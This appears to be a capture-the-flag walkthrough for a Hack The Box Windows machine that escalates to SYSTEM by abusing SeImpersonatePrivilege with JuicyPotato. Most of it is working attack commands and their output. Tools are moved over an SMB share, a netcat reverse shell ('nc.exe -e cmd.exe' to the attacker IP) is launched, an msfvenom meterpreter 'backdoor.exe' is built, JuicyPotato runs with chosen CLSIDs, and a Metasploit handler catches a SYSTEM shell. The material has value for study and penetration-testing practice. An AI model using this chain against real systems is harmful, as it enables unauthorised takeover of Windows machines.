Exploiting ‘‘SeImpersonatePrivilege’ using Juicypotato for privilege escalation Link to heading
Lets take a sceanrio we have initail reverse shell or nomral user shell which requires to be elvated as Administrator.Checking the Privilege of cuurent user we have noticed “SeImpersonatePrivilege” is enabled.
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Windows\SysWOW64\inetsrv>
The below one privilege can be exploited using the [Juicypotato](Release Fresh potatoes · ohpe/juicy-potato · GitHub) for most of the windows machine
SeImpersonatePrivilege Impersonate a client after authentication Enabled
The excecutable of Juicypotato can be downloaded to Kali machine and can transfer using any method to windows. I am using “smbshare” method here.
On Kali machine( where the juicy potato file present) Start smb-share server service Link to heading
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ smbserver.py share . -smb2support -username df -password df
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
On WIndows(destination) use the commands below to copy the excecutables Link to heading
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/10/2018 23:07 Administrator
d----- 12/10/2018 23:12 DefaultAppPool
d----- 12/10/2018 20:16 Destitute
d-r--- 12/10/2018 20:08 Public
d----- 12/10/2018 23:54 test
d----- 12/10/2018 23:40 WWW Anon Access
cd Destitute
cd Documents
net use \\10.10.14.12\share /u:df df
The command completed successfully.
copy \\10.10.14.12\share\JuicyPotato.exe JuicyPotato.exe
ls
Directory: C:\Users\Destitute\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 03/03/2022 00:07 347648 JuicyPotato.exe
net use /d \\10.10.14.12\share
\\10.10.14.12\share was deleted successfully
In my earlier experience, i had trouble in running juicypotato from powershell. Its easier to get it excecute from a normal command prompt. I have copied “nc.exe” to windows. You can try running from powershell itslef fir testing. Link to heading
Locate the “nc.exe” from Kali and and copy to “smbshareserver” folder which is running Link to heading
──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ cp /usr/share/windows-resources/binaries/nc.exe .
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ ls
Invoke-PowerShellTcp.ps1 JuicyPotato.exe nc.exe
On Windows copy the file to directory which you have access:
copy \\10.10.14.12\share\nc.exe nc.exe
ls
Directory: C:\Users\Destitute\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 03/03/2022 00:07 347648 JuicyPotato.exe
-a---- 03/03/2022 00:23 59392 nc.exe
net use /d \\10.10.14.12\share
\\10.10.14.12\share was deleted successfully.
Directory: C:\Users\Destitute\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 03/03/2022 00:07 347648 JuicyPotato.exe
-a---- 03/03/2022 00:23 59392 nc.exe
net use /d \\10.10.14.12\share
\\10.10.14.12\share was deleted successfully.
.\nc.exe -e cmd.exe 10.10.14.12 8989
Got a normal commnd shell and now we see the systeminfo to find the CLSID
$ nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.116] 49679
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Users\Destitute\Documents>systeminfo
systeminfo
Host Name: CONCEAL
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.15063 N/A Build 15063
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00329-00000-00003-AA343
Original Install Date: 12/10/2018, 20:04:27
System Boot Time: 02/03/2022, 00:21:13
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,060 MB
Virtual Memory: Max Size: 3,199 MB
Virtual Memory: Available: 2,211 MB
Virtual Memory: In Use: 988 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.116
[02]: fe80::e97c:8980:56ae:4cc9
[03]: dead:beef::7593:12e5:4a97:139c
[04]: dead:beef::69d7:5f30:5fa5:e0af
[05]: dead:beef::e97c:8980:56ae:4cc9
[06]: dead:beef::4d
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
First i have tried without mentioning and CLSID. however it failed.
Directory of C:\Users\Destitute\Documents
03/03/2022 00:41 <DIR> .
03/03/2022 00:41 <DIR> ..
03/03/2022 00:07 347,648 JuicyPotato.exe
03/03/2022 00:23 59,392 nc.exe
03/03/2022 00:41 56 rev.bat
3 File(s) 407,096 bytes
2 Dir(s) 9,699,618,816 bytes free
C:\Users\Destitute\Documents>JuicyPotato.exe -t * -p rev.bat -l 5555
JuicyPotato.exe -t * -p rev.bat -l 5555
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 5555
COM -> recv failed with error: 10038
Tried another one from the CLSID found taken from [here](juicy-potato/CLSID at master · ohpe/juicy-potato · GitHub) and it failed due to the wrong CLSID used
CLSIDC:\Users\Destitute\Documents>JuicyPotato.exe -t * -p rev.bat -l 5555 -c {9E175B9C-F52A-11D8-B9A5-505054503030}
JuicyPotato.exe -t * -p rev.bat -l 5555 -c {9E175B9C-F52A-11D8-B9A5-505054503030}
Testing {9E175B9C-F52A-11D8-B9A5-505054503030} 5555
COM -> recv failed with error: 10038
Using the correct CLSID i am able to see it works. In the final section , i will explain how to find the correct CLSID
C:\Users\Destitute\Documents>JuicyPotato.exe -t * -p rev.bat -l 5555 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
JuicyPotato.exe -t * -p rev.bat -l 5555 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 5555
......
[+] authresult 0
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
However there is no reverse shell. Intead of nc.exe I have created msfvenom reverse shell and repeated the same process with CLSID and i have got the privileged shell.
─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=5555 --arch x64 -f exe -o backdoor.exe 130 ⨯
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: backdoor.exe
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ smbserver.py share . -smb2support -username df -password df
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporatio
On Windows i have used the same file transfer technique to copy the reverse shell excecutables.Run the multi handler or netcat listner on Linux and run the Juicy potato exploit with newly transferred reverse shell. -l option is used for specifying the COM listening port on windows which can be any ports, i have used the same port which i have used for backdoor shell for keeping it simple.
c:\Users\Destitute>cd Documents
cd Documents
c:\Users\Destitute\Documents>net use \\10.10.14.12\share /u:df df
net use \\10.10.14.12\share /u:df df
The command completed successfully.
c:\Users\Destitute\Documents>copy \\10.10.14.12\share\backdoor.exe backdoor.exe
copy \\10.10.14.12\share\backdoor.exe backdoor.exe
1 file(s) copied.
c:\Users\Destitute\Documents>JuicyPotato.exe -t * -p backdoor.exe -l 5555 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
JuicyPotato.exe -t * -p backdoor.exe -l 5555 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 5555
......
[+] authresult 0
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM
Privileged shell as “nt authority\system” Link to heading
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.12
LHOST => 10.10.14.12
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.12 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.12:5555
[*] Sending stage (200262 bytes) to 10.10.10.116
[*] Meterpreter session 1 opened (10.10.14.12:5555 -> 10.10.10.116:49701) at 2022-03-02 20:05:32 -0500
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > shell
Process 4540 created.
Channel 1 created.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd c:\users\Administrator
cd c:\users\Administrator
c:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0DCA-A9F4
Directory of c:\Users\Administrator
12/10/2018 22:07 <DIR> .
12/10/2018 22:07 <DIR> ..
12/10/2018 19:17 <DIR> Contacts
17/03/2021 16:01 <DIR> Desktop
12/10/2018 19:17 <DIR> Documents
17/03/2021 16:01 <DIR> Downloads
12/10/2018 19:17 <DIR> Favorites
12/10/2018 19:17 <DIR> Links
12/10/2018 19:17 <DIR> Music
17/03/2021 15:10 <DIR> OneDrive
12/10/2018 19:17 <DIR> Pictures
12/10/2018 19:17 <DIR> Saved Games
12/10/2018 19:17 <DIR> Searches
12/10/2018 19:17 <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 9,699,082,240 bytes free
c:\Users\Administrator>cd Desktop
cd Desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0DCA-A9F4
Directory of c:\Users\Administrator\Desktop
17/03/2021 16:01 <DIR> .
17/03/2021 16:01 <DIR> ..
12/10/2018 22:57 32 proof.txt
1 File(s) 32 bytes
2 Dir(s) 9,699,082,240 bytes free
How to get correct CLSID Link to heading
CLSID is unique identifier in windows system. For more details on CLSID refer [here](CLSID Key - Win32 apps | Microsoft Docs).Based on the operating system we can get from [here](juicy-potato/CLSID/Windows_10_Enterprise at master · ohpe/juicy-potato · GitHub) and some CLSID randomly. Or some [scripts ](Windows CLSID | juicy-potato)allows to test these CLSID and can provide some results which may work. copy these files to Windows machine
[Test script](Rchitect/test_clsid.bat at Yoda · tcprks/Rchitect · GitHub)
[CLSID list](Rchitect/CLSID.list at Yoda · tcprks/Rchitect · GitHub)( based on the system info’s window’s version the list will be different. refer [here](juicy-potato/CLSID at master · ohpe/juicy-potato · GitHub))
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ head -5 CLSID.list 127 ⨯
{BA7C0D29-81CA-4901-B450-634E20BB8C34}
{8C334A55-DDB9-491c-817E-35A6B85D2ECB}
{A5065670-136D-4FD6-A45F-00C85B90359C}
{A5B020FD-E04B-4e67-B65A-E7DEED25B2CF}
{C0DCC3A6-BE26-4bad-9833-61DFACE1A8DB}
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ head -5 test_clsid.bat
@echo off
:: Starting port, you can change it
set /a port=10000
SETLOCAL ENABLEDELAYEDEXPANSION
Use some windows file transfer methods to transfer these files to windows.Once transferred run the bat file look for some CLSID in result.log which is running as “NT Authority/SYSTEM”. Full results are uploaded here.
.\test_clsid.bat
{BA7C0D29-81CA-4901-B450-634E20BB8C34} 10000
{8C334A55-DDB9-491c-817E-35A6B85D2ECB} 10000
{A5065670-136D-4FD6-A45F-00C85B90359C} 10000
{A5B020FD-E04B-4e67-B65A-E7DEED25B2CF} 10000
{C0DCC3A6-BE26-4bad-9833-61DFACE1A8DB} 10000
{924DC564-16A6-42EB-929A-9A61FA7DA06F} 10000
{3631271D-DDD3-40f2-AC17-B13A3742BA62} 10000
{217700E0-2001-11DF-ADB9-F4CE462D9137} 10000
{3480A401-BDE9-4407-BC02-798A866AC051} 10000
Try the Juicypotato commands with some of the CLSID’s running as “NT Authority/SYSTEM”
Testing with One more CLSID than we tried earlier
Directory of C:\users\Destitute\Documents
04/03/2022 00:26 <DIR> .
04/03/2022 00:26 <DIR> ..
03/03/2022 01:00 7,168 backdoor.exe
03/03/2022 01:16 28,640 CLSID.list
03/03/2022 01:19 1,580 GetCLSID.ps1
03/03/2022 01:20 259 getclsidtest.ps1
03/03/2022 00:07 347,648 JuicyPotato.exe
03/03/2022 00:23 59,392 nc.exe
04/03/2022 00:42 4,657 result.log
09/03/2021 20:08 285 test_clsid.bat
8 File(s) 449,629 bytes
2 Dir(s) 9,719,095,296 bytes free
JuicyPotato.exe -t * -p backdoor.exe -l 5555 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}
JuicyPotato.exe -t * -p backdoor.exe -l 5555 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}
Testing {d20a3293-3341-4ae8-9aaf-8e397cb63c34} 5555
......
[+] authresult 0
{d20a3293-3341-4ae8-9aaf-8e397cb63c34};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
We got reverse shell as “nt authority\system”
ayload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.12 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.12:5555
[*] Sending stage (200262 bytes) to 10.10.10.116
[*] Meterpreter session 2 opened (10.10.14.12:5555 -> 10.10.10.116:50774) at 2022-03-03 20:18:49 -0500
meterpreter > shell
Process 4920 created.
Channel 1 created.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Practical Notes: Link to heading
Make sure the operating system is listed under the exploit page even if you see the “SeImpersonatePrivilege"enabled. The exploit have some issues for some system while running from powershell. If not working from powershell get a command line using the “nc.exe” command. Some times you dont need to find the specific CLSID and the default CLSID will work. If not you should find the correct CLSID for the juciy portato to work. we can try genrating the reverse shell using the “nc.exe” or “msfvenom generated scripts”. In this case “nc.exe” did not work so i have to use “msfvenom”.There are some [automatic CLSID scripts](Rchitect/GetCLSID.ps1 at Yoda · tcprks/Rchitect · GitHub) which did not help me as well in this case. I got a simpler version from some research on internet which i have shared [here](Rchitect/test_clsid.bat at Yoda · tcprks/Rchitect · GitHub). For this script to work the [list CLSID ](Rchitect/CLSID.list at Yoda · tcprks/Rchitect · GitHub)corresponding to windows operating system should be present in the same folder you run the script.